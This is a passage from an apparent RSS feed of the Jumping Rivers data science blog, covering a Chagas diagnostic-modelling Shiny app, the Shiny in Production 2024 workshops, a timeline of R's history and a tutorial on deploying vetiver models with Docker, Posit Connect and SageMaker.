&lt;p&gt;The application is entirely built using Shiny and it incorporates a separate R library (&lt;a href="https://github.com/finddx/patientpathways" rel="external"&gt;patientpathways &lt;/a&gt;), developed by FIND that contains all the analysis algorithms. It is designed to let users select different scenarios and specify parameters about the target population they are analyzing, like prevalence, testing costs, and the type of test used. The results show the recommended testing approach, the expected number of diagnosed cases, the cost per diagnosed case, along with the positive and negative predictive values. A comprehensive outcomes table is included in the results section and users have the option to download the results as an html report, to help them with further dissemination.&lt;/p&gt;
&lt;p&gt;The Chagaspathways application is designed to be a user-friendly tool for public health professionals, recommending the most economical testing approaches to maximize resources and achieve the best results for patients and healthcare infrastructures. The application is intended to expand its scope to cover additional diseases, aiming to become an essential asset in global health initiatives for disease diagnostic modeling.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024: Workshops</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/</link><pubDate>Thu, 04 Jul 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;Shiny in Production is returning to the Catalyst, Newcastle upon Tyne,
for its third instalment this October. We’ve expanded the itinerary this
year, with four workshops to choose from as well as a day of talks, with
speakers soon to be announced. Full details of the workshop are below,
and you can head over to the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference
website&lt;/a&gt; to register.
Join us for an immersive experience tailored for both beginners and
advanced users of Shiny and other web-based R packages.&lt;/p&gt;
&lt;p&gt;The first day of the conference (Wednesday 9th October), will consist of
the four parallel workshops, followed by a drinks reception in the
evening, a great opportunity for networking and debriefing from the
day’s learning.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="level-up-your-plots-tips-tricks-and-resources-for-crafting-compelling-visualisations---cara-thompson"&gt;Level up your plots: Tips, tricks and resources for crafting compelling visualisations - &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Data visualisations are a great asset in getting people talking about
your findings. From making the patterns in the data easy to see, to
making a big visual statement and keeping people talking beyond the end
of your presentation, transforming your plots from functional to
aesthetically pleasing and visually compelling is about so much more
than making things pretty.&lt;/p&gt;
&lt;p&gt;In this workshop, we’ll explore how we can make the most of colours,
different plot types, text, and interactivity to maximise the impact of
our visualisations. Here’s where we’re looking to boost your dataviz
confidence:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;crafting intuitive dataviz-friendly colour palettes without
compromising on accessibility (or creativity!)&lt;/li&gt;
&lt;li&gt;selecting the right type of dataviz for your data and your story&lt;/li&gt;
&lt;li&gt;making the most of typography to optimise text hierarchy and
readability&lt;/li&gt;
&lt;li&gt;using annotations wisely to both help interpretation and declutter the
visualisations&lt;/li&gt;
&lt;li&gt;turning your ggplot into an interactive plot for additional data
exploration&lt;/li&gt;
&lt;li&gt;packaging up your decisions, easy reuse across plots (and projects!)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is intended as a hands-on workshop, so bring along a laptop, a plot
you’re working on or a research question, and some data. Throughout the
workshop, I will highlight free resources for each of these aspects of
dataviz development. The aim is for you to leave with a plot that you’d
be happy to publish, and with some resources you can continue to build
on.&lt;/p&gt;
&lt;h4 id="about-the-speaker"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/cara@2x.jpg" alt="Photo of Cara Thompson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Cara is a freelance data consultant with an academic background,
specialising in dataviz and in “enhanced” reproducible outputs. She
lives in Edinburgh, Scotland, and is passionate about maximising the
impact of other people’s expertise.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="building-responsive-shiny-applications---pedro-silva"&gt;Building Responsive Shiny Applications - &lt;a href="https://pedrocsilva.com/" rel="external"&gt;Pedro Silva&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The diverse range of devices used for modern web browsing presents
challenges when designing an application that works well for all users.
Enter responsive design: the practice of building fluid web pages that
“work” on huge 4k and 5k monitors, tiny smartphones and all things in
between. This course will look at responsive design principles and best
practices for Shiny developers, covering page layout, easy-to-add
widgets and some simple CSS tricks for when built-in solutions don’t
quite cut it.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;know what responsive web design is&lt;/li&gt;
&lt;li&gt;know how to use flexible grids to adjust page layout for mobile,
tablet and desktop&lt;/li&gt;
&lt;li&gt;be able to use HTML5 elements and Shiny Widgets to use limited space
efficiently and effectively&lt;/li&gt;
&lt;li&gt;know how to add CSS and JavaScript snippets to an app for finer
customisations&lt;/li&gt;
&lt;li&gt;understand how to test Shiny apps on various screen sizes from desktop
to mobile&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-1"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/pedro@2x.jpg" alt="Photo of Pedro Silva" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Pedro is a full stack developer with over 15 years of experience in the
field, loves front-end and R Shiny development, and is a moonlight
practitioner of JavaScript dark arts.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="asynchronous-shiny---russ-hyde"&gt;Asynchronous Shiny - &lt;a href="https://github.com/russHyde" rel="external"&gt;Russ Hyde&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Imagine you couldn’t register to attend “Shiny in Production” if someone
else was in the process of registering, and you had to wait until they
had finished before you could click to “Buy tickets on EventBrite”. This
kind of “blocking” shouldn’t happen in modern web applications but is
surprisingly common in Shiny applications. It happens because a single R
process handles all of the server-side processing for multiple users—one
long-running task can prevent any other task from proceeding, hampering
interactivity both between and within user-sessions.&lt;/p&gt;
&lt;p&gt;Fortunately, Shiny’s support for asynchronous programming can alleviate
this problem. In the asynchronous approach, you start tasks running
without having to wait for them to complete. But, this requires a change
in mindset for many programmers and there are a few concepts to
understand before you can take advantage of this approach. So, what are
you waiting for? Sign up for this workshop!&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand how within-session and between-session blocking can arise
in a Shiny app&lt;/li&gt;
&lt;li&gt;understand the basics of asynchronous computation&lt;/li&gt;
&lt;li&gt;solve between-session blocking with future/promise&lt;/li&gt;
&lt;li&gt;solve blocking the modern way, with ExtendedTask&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-2"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/russ@2x.jpg" alt="Photo of Russ Hyde" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Russ has previously worked in molecular biology and bioinformatics. He
holds a PhD in Molecular Physiology and MSc in Mathematics. Russ is an
author of several CRAN packages and mentor on the R-for-data-science
community.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="building-apps-for-humans---clarissa-barratt"&gt;Building Apps for Humans - &lt;a href="https://www.linkedin.com/in/clarissajbarratt/" rel="external"&gt;Clarissa Barratt&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Frameworks like Shiny and Dash can help those with a scientific or
mathematical background communicate their research in a way that’s
interactive and engaging. But while these tools can make constructing a
graphical user interface quicker and easier, there’s no guarantee that
the end product is going to be optimised for human use.&lt;/p&gt;
&lt;p&gt;This workshop is aimed at scientists (and the curious) that are
interested in learning some basics of human-computer interaction and
gaining an understanding for how science itself can assist with the
development of better user interfaces that, in turn, lead to improved
user experiences.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand the benefits that come from designing applications with the
human mind in mind&lt;/li&gt;
&lt;li&gt;know how the layout, colour, size and motion of interface and
graphical components can be used to enhance (or detract from) a user’s
experience&lt;/li&gt;
&lt;li&gt;understand the importance of providing users with feedback so they can
tell both whether their actions have been successful and what the
current state of the application is&lt;/li&gt;
&lt;li&gt;be able to identify some common problems found in web applications&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-3"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/clarissa@2x.jpg" alt="Photo of Clarissa Barratt" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;While working towards her PhD in applied mathematics Clarissa discovered
her love of science communications. Her goal is to make data science
accessible to everyone, and to encourage people to engage with the
goings on at Jumping Rivers.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="whats-next"&gt;What’s next?&lt;/h3&gt;
&lt;p&gt;Early bird tickets for the conference are still available till the end
of July, so don’t miss out! The full line up of speakers will be
announced in the coming weeks. Still not convinced? Head over to our
&lt;a href="https://www.youtube.com/@jumping-rivers" rel="external"&gt;YouTube channel&lt;/a&gt; to take a
look at lineups from previous years to see what we have in store.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>A timeline of R's first 30 years</title><link>https://www.jumpingrivers.com/blog/r-timeline/</link><pubDate>Thu, 27 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-timeline/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-timeline/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-timeline/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;link rel="stylesheet" type="text/css" href="assets/style.css" /&gt;
&lt;script src="assets/resize.mjs" type="module"&gt;&lt;/script&gt;
&lt;p&gt;August 2023 marked the thirtieth anniversary of the first public release of the R programming language. To celebrate this, and to show how far the language has evolved across those three decades, the timeline below shows some landmark events, packages and papers (with some Jumping Rivers items thrown in for good measure). Have we missed any of your personal favourites? Let us know via our social media channels and we&amp;rsquo;ll see if we can squeeze them in. On browsers that support it, double click/tap on any image or video on the timeline to see it full screen.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-r-timeline"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;You can also view the timeline as a &lt;strong&gt;&lt;a href="https://www.jumpingrivers.com/misc/timeline/"&gt;standalone page&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;iframe id="timeline" title="Timeline of landmarks related to the R programming language from 1993 to 2023" src="https://www.jumpingrivers.com/misc/timeline" scrolling="no" frameBorder="0" width="100%"&gt;&lt;/iframe&gt;
&lt;aside&gt;
&lt;p&gt;The timeline idea was inspired by Figure 1 in the article &lt;a href="https://www.mdpi.com/2075-1729/12/5/648" rel="external"&gt;&amp;ldquo;The R Language: An Engine for Bioinformatics and Data Science&amp;rdquo;&lt;/a&gt; by Federico M. Giorgi, Carmine Ceraolo and Daniele Mercatelli in the open-access journal &lt;a href="https://www.mdpi.com/journal/life" rel="external"&gt;&lt;em&gt;Life&lt;/em&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-timeline/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: Model Deployment</title><link>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/</link><pubDate>Thu, 20 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is Part 2 of a series of blogs on {vetiver}:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;Vetiver: First steps in MLOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Vetiver: Model Deployment (this post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;Vetiver: Monitoring Models in Production&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 4: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;Vetiver: MLOps for Python&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;In our previous blog, we provided an overview of MLOps and the
&lt;a href="https://rstudio.github.io/vetiver-r/" rel="external"&gt;{vetiver}&lt;/a&gt; package, creating and
deploying a simple model locally. In this post, we’ll show you how to
deploy a model to production using &lt;a href="https://posit.co/products/enterprise/connect/" rel="external"&gt;Posit
Connect&lt;/a&gt;,
&lt;a href="https://aws.amazon.com/sagemaker/" rel="external"&gt;SageMaker&lt;/a&gt;, and Docker.&lt;/p&gt;
&lt;h2 id="what-is-docker"&gt;What is Docker&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.docker.com" rel="external"&gt;Docker&lt;/a&gt; is an open-source platform that allows
developers to build, deploy, and run containers. These containers bundle
application source code with the operating system libraries and
dependencies needed to run that code.&lt;/p&gt;
&lt;p&gt;Previously, we discussed deploying a &lt;a href="https://www.jumpingrivers.com/blog/shiny-auto-docker/" rel="external"&gt;Shiny
Application&lt;/a&gt;
using Docker. Similarly, we can deploy a set of APIs to access our
model.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-vetiver-deploying-mlops-docker"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="creating-a-docker-file"&gt;Creating a Docker file&lt;/h3&gt;
&lt;p&gt;The {vetiver} package simplifies creating a Dockerfile. We simply run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_prepare_docker&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;colin/k-nn&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; docker_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8080&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This command accomplishes several tasks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Uses the &lt;a href="https://rstudio.github.io/renv/articles/renv.html" rel="external"&gt;&lt;code&gt;{renv}&lt;/code&gt;&lt;/a&gt;
package to create a list of R package dependencies required to run
your model.&lt;/li&gt;
&lt;li&gt;Creates a file named &lt;code&gt;plumber.R&lt;/code&gt; containing the necessary code to
deploy an API, essentially just &lt;code&gt;vetiver_api()&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Generates the Dockerfile.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Dockerfile includes several components. The first component sets the
R version, specifies the package repository, and crucially, installs the
necessary system libraries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rocker/r-ver:4.4.0&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;ENV&lt;/span&gt; RENV_CONFIG_REPOS_OVERRIDE https://packagemanager.rstudio.com/cran/latest&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; apt-get update -qq &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get install -y --no-install-recommends &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; ...&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The second component copies the renv.lock file and installs the required
R packages:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; vetiver_renv.lock renv.lock&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;install.packages(&amp;#39;renv&amp;#39;)&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;renv::restore()&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we have the plumber/API section&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; plumber.R /opt/ml/plumber.R&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;EXPOSE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;8080&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;ENTRYPOINT&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;-e&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;pr &amp;lt;- plumber::plumb(&amp;#39;/opt/ml/plumber.R&amp;#39;); pr$run(host = &amp;#39;0.0.0.0&amp;#39;, port = 8080)&amp;#34;&lt;/span&gt;]&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which runs the API on port 8080.&lt;/p&gt;
&lt;p&gt;The container is built via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker build --tag my-first-model .&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;--tag&lt;/code&gt; flag allows you to name your Docker image. You can inspect
your stored Docker images with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker image list
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;REPOSITORY TAG IMAGE ID CREATED SIZE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my-first-model latest 792af21c775a About a minute ago 1.33GB
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To run the image, use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm --publish 8080:8080 my-first-model
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="posit-connect--sage-maker"&gt;Posit Connect / Sage Maker&lt;/h2&gt;
&lt;p&gt;We can also trivially publish the model to Posit Connect via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_deploy_rsconnect&lt;/span&gt;(board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;colin/k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Similarly, we can publish to SageMaker using the function
&lt;code&gt;vetiver_deploy_sagemaker()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: First steps in MLOps</title><link>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/</link><pubDate>Thu, 13 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is Part 1 of a series of blogs on {vetiver}. Future blogs will
be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Vetiver: First steps in MLOps (This post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;Vetiver: Model Deployment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;Vetiver: Monitoring Models in Production&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 4: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;Vetiver: MLOps for Python&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Most R users are familiar with the classic workflow popularised by R for
Data Science. Data scientists begin by importing and cleaning the data,
then iteratively transform, model, and visualise it. Visualisation
drives the modeling process, which in turn prompts new visualisations,
and periodically, they summarise their work and report results.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/r4ds.svg" alt="Traditional data science workflow diagram. Stages are import, tidy, then transform, visualise, model in a loop, then communicate." style="display: block; margin: auto;" /&gt;
&lt;p&gt;This workflow stems partly from classical statistical modeling, where we
are interested in a limited number of models and understanding the
system behind the data. In contrast, machine learning prioritises
prediction, necessitating the consideration and updating of many models.
Machine Learning Operations (MLOps) expands the modeling component of
the traditional data science workflow, providing a framework to
continuously build, deploy, and maintain machine learning models in
production.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/ml_ops_cycle.svg" alt="Machine learning cycle diagram. Stages are import + tidy, model, version, deploy, monitor, looping backround to import and tidy. Version, deploy and monitor are all gathered under the logo for vetiver." style="display: block; margin: auto;" /&gt;
&lt;h2 id="data-importing-and-tidying"&gt;Data: Importing and Tidying&lt;/h2&gt;
&lt;p&gt;The first step in deploying your model is automating data importation
and tidying. Although this step is a standard part of the data science
workflow, a few considerations are worth highlighting.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;File formats:&lt;/strong&gt; Consider moving from large CSV files to a more
efficient format like Parquet, which reduces storage costs and
simplifies the tidying step.&lt;/p&gt;
